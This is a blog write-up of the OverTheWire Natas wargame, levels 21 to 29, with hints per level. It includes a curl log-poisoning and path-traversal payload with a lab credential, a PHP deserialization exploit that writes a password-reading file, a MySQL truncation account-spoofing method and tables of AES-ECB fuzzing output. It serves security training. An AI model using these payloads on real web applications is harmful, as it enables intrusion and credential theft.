Overthewire : Natas : 21 - 34
22 September, 2020
A brief writeup of solving the Overthewire War Game Natas, levels 21 through 34
20 ➜ 21
- Use `?debug` and observe the code
- A particular part of the session cookie is dependent on your input
- The input is not sanitized, but it is read line by line and checked for a particular flag.
- Craft the necessary input and the password will show itself...
21 ➜ 22
- No input validation again
- Manipulate the session on one website and the other gives you the password
22 ➜ 23
- Browsers are too obedient, what with the Location header they obey...
23 ➜ 24
- PHP's documentation will point out some interesting insights into string comparison.
- A specially crafted input will get you the password
24 ➜ 25
- `strcmp` doesn't always speak the truth
25 ➜ 26
- Check the language files by constructing a path from the source code.
- There is only one file being written to, and it is written with unsanitized input
- Write PHP to that file and open it as a language file
```sh
# the payload has to travel in the real User-Agent header, which PHP exposes as $_SERVER['HTTP_USER_AGENT']
curl 'http://natas25.natas.labs.overthewire.org/?lang=../.../...//logs/natas25_371iikrbf5bpk6eouu6a48tvb2.log' -H 'Authorization: Basic bmF0YXMyNTpHSEY2WDdZd0FDYVlZc3NIVlkwNWNGcTgzaFJrdGw0Yw==' -H 'Cookie: PHPSESSID=371iikrbf5bpk6eouu6a48tvb2' -H 'User-Agent: <?php global $__FOOTER; $__FOOTER=file_get_contents("/etc/natas_webpass/natas26"); ?>'
```
26 ➜ 27
- Image operations are a distraction
- Focus on something that you can input directly to the program
- Logger object is writing to files
- Some encoded code will get you the answer
```php
<!DOCTYPE html>
<html>
<body>
<?php
// Property names must match the Logger class in the natas26 source,
// otherwise the unserialized object is not a usable Logger.
class Logger{
    private $logFile;
    private $initMsg;
    private $exitMsg;

    function __construct(){
        $this->initMsg="echo";
        // written into $logFile by the server-side __destruct(); the file is then fetched as img/temp.php
        $this->exitMsg="<?php print file_get_contents('/etc/natas_webpass/natas27'); ?>\n";
        $this->logFile="/var/www/natas/natas26/img/temp.php";
    }
}
$logger = new Logger();
// the base64 string goes into the drawing cookie that the level unserializes
print base64_encode(serialize($logger));
?>
</body>
</html>
```
- I didn't get this in the first try, had to dig around the interwebs for some hints
27 ➜ 28
- Turns out there's a bug in MySQL that ignores trailing whitespace when a WHERE clause filters on a string column
- If you try to exceed the max length of a field with a sparse string, the string is truncated; however, the white spaces are not removed.
- Create a new user 'natas28<spaces>xyz' with a password
- Now the WHERE query would return two natas28 rows because of the bug
- Now send natas28 with an empty password and `dumpData` will give away the password
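The two behaviours above, modelled in code as an added example that is not the level's own: a MySQL server without strict mode truncates a value longer than the column, and PAD SPACE collations ignore trailing spaces when comparing, so 'natas28' followed by 57 spaces and 'xyz' is stored as 'natas28' plus spaces and then matches `WHERE username = 'natas28'`. The column width, account names and passwords are assumptions. The hardened store shows the application-side fix (refuse anything the database would rewrite, and check for collisions using the database's own comparison), and the audit method is the query a DBA could run to find rows already affected.

```python
# Constructed model of the registration/lookup flow behind the natas28 trick.
# Not the level's code: the column width, account names and passwords are
# assumptions chosen for the demonstration.
USERNAME_WIDTH = 64


def mysql_stored_form(value, width=USERNAME_WIDTH):
    """What a MySQL server without STRICT_TRANS_TABLES keeps for a
    VARCHAR(width) column: characters past the width are silently dropped."""
    return value[:width]


def pad_space_equal(a, b):
    """PAD SPACE collation semantics for CHAR/VARCHAR comparison (every
    collation before MySQL 8.0's NO PAD ones): trailing spaces are ignored."""
    return a.rstrip(" ") == b.rstrip(" ")


class VulnerableUserStore:
    """Registration with no validation: the row is whatever the server kept."""

    def __init__(self):
        self.rows = []  # (stored_username, password) in insertion order

    def register(self, username, password):
        self.rows.append((mysql_stored_form(username), password))

    def rows_for(self, username):
        """Equivalent of SELECT * FROM users WHERE username = ? under PAD SPACE."""
        return [(u, p) for u, p in self.rows if pad_space_equal(u, username)]

    def audit_padded_names(self):
        """Detection query for the DBA, in SQL terms:
        SELECT username FROM users WHERE username <> TRIM(TRAILING ' ' FROM username)"""
        return [u for u, _ in self.rows if u != u.rstrip(" ")]


def validate_username(name, width=USERNAME_WIDTH):
    """Refuse anything the database would silently rewrite or compare loosely."""
    if not name:
        raise ValueError("empty username")
    if len(name) > width:
        raise ValueError("longer than the column; the server would truncate it")
    if name != name.strip():
        raise ValueError("leading/trailing whitespace is ignored in comparisons")
    return name


class HardenedUserStore(VulnerableUserStore):
    """Same storage model, but validates first and refuses collisions using
    the same comparison the database will apply at login time."""

    def register(self, username, password):
        validate_username(username)
        if self.rows_for(username):
            raise ValueError("username already taken")
        super().register(username, password)


def demo():
    victim = "natas28"  # existing account (assumption)
    spoof = victim + " " * (USERNAME_WIDTH - len(victim)) + "xyz"  # 67 chars
    weak = VulnerableUserStore()
    weak.register(victim, "real-secret")
    weak.register(spoof, "chosen-by-registrant")
    hard = HardenedUserStore()
    hard.register(victim, "real-secret")
    try:
        hard.register(spoof, "chosen-by-registrant")
        blocked = False
    except ValueError:
        blocked = True
    # (rows matching natas28 in the weak store, padded rows found by audit, hardened store refused?)
    return len(weak.rows_for(victim)), weak.audit_padded_names(), blocked


if __name__ == "__main__":
    print(demo())
```

Server-side, the same trick is stopped by `sql_mode=STRICT_TRANS_TABLES` (truncation becomes an error instead of a warning) and by a UNIQUE index on the username column (with a PAD SPACE collation the index already treats 'natas28 ' and 'natas28' as duplicates); the Python model stands in for those checks so the example runs offline.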
28 ➜ 29
- Try searching for something and observe the query parameter; it looks to be some kind of encrypted form of the query string
- Try removing a few characters and you'll see an error
- Googling that error gives a hint: this could be an AES-encrypted string
- Try fuzzing the query with different inputs of different lengths, different characters
length | encrypted query
0 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLof/YMma1yzL2UfjQXqQEop36O0aq+C10FxP/mrBQjq0eOsaH+JhosbBUGEQmz/to=
1 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKriAqPE2++uYlniRMkobB1vfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
2 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKxMKUxvsiccFITv6XJZnrHSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
3 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIvUpOmOsuf6Me06CS3bWodmi4rXbbzHxmhT3Vnjq2qkEJJuT5N6gkJR5mVucRLNRo=
4 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPI1BKmpZ1/9YUtPH5DShPyqKSh/PMVHnhLmbzHIY7GAR1bVcy3Ix3D2Q5cVi8F6bmY=
5 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLDah8EaRWKMFIWYUal4/LsrDuHHBxEg4a0XNNtno9y9GVRSbu6ISPYnZVBfqJ/Ons=
6 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJKEf/nOv0V2qBes8NIbc3hQcCYxLrNxe2TV1ZOUQXdfmTQ3MhoJTaSrfy9N5bRv4o=
7 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKf3hzvbj+EoXJjPzB0/I4YZIaVSupG+5Ppq4WEW09L0Nf/K3JUU/wpRwHlH118D44=
8 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJFPgAgYC9NzNUPDrdwlHfCiW3pCIT4YQixZ/i0rqXXY5FyMgUUg+aORY/QZhZ7MKM=
9 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKeYiaGpSZAWVcGCZq8sFK7oJUi8wHPnTascCPxZZSMWpc5zZBSL6eob5V3O1b5+MA=
10 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6Oec4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI=
11 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OetO2gh9PAvqK+3BthQLni68qM9OYQkTq645oGdhkgSlo=
12 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OezoKpVTtluBKA+2078pAPR3X9UET9Bj0m9rt/c0tByJk=
13 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OeH3RxTXb8xdRkxqIh5u2Y5GIjoU2cQpG5h3WwP7xz1O3YrlHX2nGysIPZGaDXuIuY
14 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6Oe7NNvj9kWTUA1QORJcH0n5UJXo0PararywOOh1xzgPdF7e6ymVfKYoyHpDj96YNTY
15 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OeWu8qmX2iNj9yo/rTMtFzb6dz8xhQlKoBQI8fl9A304VnjFdz7MKPhw5PTrxsgHCk
16 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OeiSUVjPxawG0iv9oLcsjxUad+jtGqvgtdBcT/5qwUI6tHjrGh/iYaLGwVBhEJs/7a
17 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OerfihrQF37R7K06x8EIKqnr36EFTsaFFc+W8qVURZGUeQT0sqvywtdoaqcqUxUclw
18 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OeU9lJnrytaGHwS3zcJPMEYkh5mgex0ptZggFck1XC4A6t7ZvbrKanO3GzWgENLExX
19 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OepUn9pSttm04mMtsxg4hW1ZouK1228x8ZoU91Z46tqpBCSbk+TeoJCUeZlbnESzUa
- Empty query gives a random set of jokes every time
- For each character of `string.ascii_letters`:
a =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKriAqPE2++uYlniRMkobB1vfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
b =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIYiwNnSJY7KHJGU+XjuMzVvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
c =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKEMZKNASy09t5ooTNAbaX0vfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
d =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKnMw6aSOWjayIcOCUAu7bVvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
e =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIeoxGWFgXHXykQlH86OpiMvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
f =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKX9Nbu3XXL5PIaYqiW14GSvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
g =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLV4wF7G0i3DftMhPsAyZVqvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
h =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIJJW40OKGV9h7fJBqf28f9vfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
i =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLMEPlGOfuQ7a1fFtCB5a1XvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
j =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPICgQ0oynl6FWbVHY/8dJkIvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
k =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLnuAD+NGYcU1yTMgoFGDHHvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
l =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIskS5tRSHzosjTBciCi/8VvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
m =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJTwbPiFdKuTtoify+YlBFLvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
n =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKvKlZ1HHFG9tUyBWOMONORvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
o =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIPdJbPB4AWVinSFPLRB1eYvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
p =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKD30n5dTLLZ3c/Rs9/bQwwvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
q =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKghh12LRBJ55334nG5LgfxvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
r =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKef8vfXgzqiOnKBXb2kd2cvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
s =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPI+jVOKpzBAHVGo0XIzCijxvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
t =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKLbhtgC4p7C+91shiGBL15vfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
u =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIRwoUdFyCT68E7RwSyaxRSvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
v =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIae8xMT+8hwEi33FOpyUlmvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
w =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKlwoXvDTqKtYfcUSRUbdOSvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
x =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJXwBmXBeBRhwrvq1HTCwh/vfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
y =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPL7EnsTc1X3234z1DMqyjsMvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
z =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJDB5EyzqNqQNuIYdASJqV6vfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
A =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKjd8MKDZZIiKG51FNeoPjUvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
B =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJjS9S3adXJc/WWvI3XdcvzvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
C =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIV6guc0zYmhS2FK2WeDX9XvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
D =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJPZL/HuhXFCvKgIB2/Zln5vfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
E =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJibK/FTJvyvXqxFb51bhV1vfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
F =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJhFsli4K/fPeKT4M8Ry23kvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
G =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKOKpwR3/gkTIMH8U7dhu4GvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
H =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKIDMQGG2abZtjOsSZs1X39vfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
I =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKOvt9wFI9mjTVoT/tGtl7FvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
J =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPL5KLXni7y8eqJFwXWh1DUnvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
K =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPITdJXBsJQLwvXAvasuKjoevfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
L =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPI2LEeQPtPKos7Cg24MI6rXvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
M =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIFr55FtnKO9tEyQa/+96tovfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
N =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKQYCy/DcTbyaMyrOKXW+nmvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
O =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJXWuUtLaAhQY1GD/2pLpWBvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
P =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJslle8BYSivKdpv1B2Y01FvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
Q =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJaGM8iPTFRQd0Zmcxed5mevfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
R =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJiDv3VFbwCsAwUlLNbD2BFvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
S =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJ3Nmyh1ZS++nAIX1FELIkMvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
T =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJO9/z7rq/TbEgCDg6ebTA6vfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
U =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJs9IckNOkzgew37TadMpVqvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
V =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJHdksLJFuUJ3MlCTPRoS7rvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
W =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLxGu5bRS4vnVo0bm1VgVobvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
X =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPI3GgIRwkWmfdd+oEfVBISnvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
Y =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPK6wkS+fLmU8WdWdeOrvNlhvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
Z =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLPP49oqlQoQMK4BitKnvvEvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
- For each character of `string.ascii_letters`, repeated to a fixed length of 2. This indicates that the suffix could be the input length.
aa =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKxMKUxvsiccFITv6XJZnrHSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
bb =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLKBNKdq9/0x+evkK8KHLy7SHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
cc =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJwdXah4OqsnvfitQ5gN7WnSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
dd =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKWT0U0okLYlqhbTKYuLt+ISHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
ee =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLPLIcrsAhkEWWisqIVS+q1SHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
ff =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLG2tpRa/lJxUOBFDOEgHpGSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
gg =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIlFN9yuJB+oVSW9+VFGJXySHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
hh =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJ1RmBvYLhxP871DO05ne6DSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
ii =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPItyGsQbUFGl9jXWBGvNw1BSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
jj =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLxlDgbBtilPm1QGg5dFbZCSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
kk =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLwsqVmmi5I5np2SaklrXxeSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
ll =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIIBE7iZ3vZxsO6StURlmOLSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
mm =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPI47Stm71Vg6QNrWXeiuzbfSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
nn =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKVNX2eLkHmB99ZqyBOgLKrSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
oo =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPL4oG84pYD3udfMaXjUnGNlSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
pp =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJrPHrPDFwX+zfO7iT8WRhRSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
qq =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLTgL+HwCdm90sU1kujVHccSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
rr =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLWe50HTBinLy8LnliHzDKcSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
ss =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIi9jK6/hBGgtXoRbG6b+PmSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
tt =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIqWzrZ3Z5ZNlWvU39dkVtISHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
uu =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLXgsiTfXhm8oddI8DB/iVYSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
vv =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJGA6uFUEPp5S3PF+YNYmWNSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
ww =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPK6RcM9ya1lltF7XO7HFqi9SHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
xx =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJPWNuJ4+aBnGUW4PC1pprqSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
yy =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIZWsPRIbSixRaBl1HQPzR+SHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
zz =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJzXL3LnBBpRDdq8SV9BsfrSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
AA =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKYsNYgsg1hFJebd+JNix06SHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
BB =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPK+RstvUAvyxo4jqvzobaixSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
CC =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJ4p+qySribmtALhBwB4m2NSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
DD =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLDFqRQSZGc8WFg9W3jLa1hSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
EE =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPITH6P54LtKKbKRINEhqkFQSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
FF =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLYXRZpv3i/J6Pd8h5vfZRaSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
GG =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKxhziyWZt5jL7lr1COku8WSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
HH =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLPVbf90TZW6Js78DNWw+rLSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
II =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKNdpJ3uxFvz42RE9vCZWZfSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
JJ =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKjxtHLZKrBD41naOVnQaR2SHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
KK =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPI7p0WgLLSF08nnL0KQWqlSSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
LL =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIsrlEZjia3vp5FLdCpZEAySHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
MM =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJOaZT8s12S+AV44HCaaG8LSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
NN =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLNdxfLg3cm2nEOlx67EddASHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
OO =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKzbx/UnCR2VBliUYybX7FvSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
PP =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIYRTkxrVBAqYrWsFAqw2X7SHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
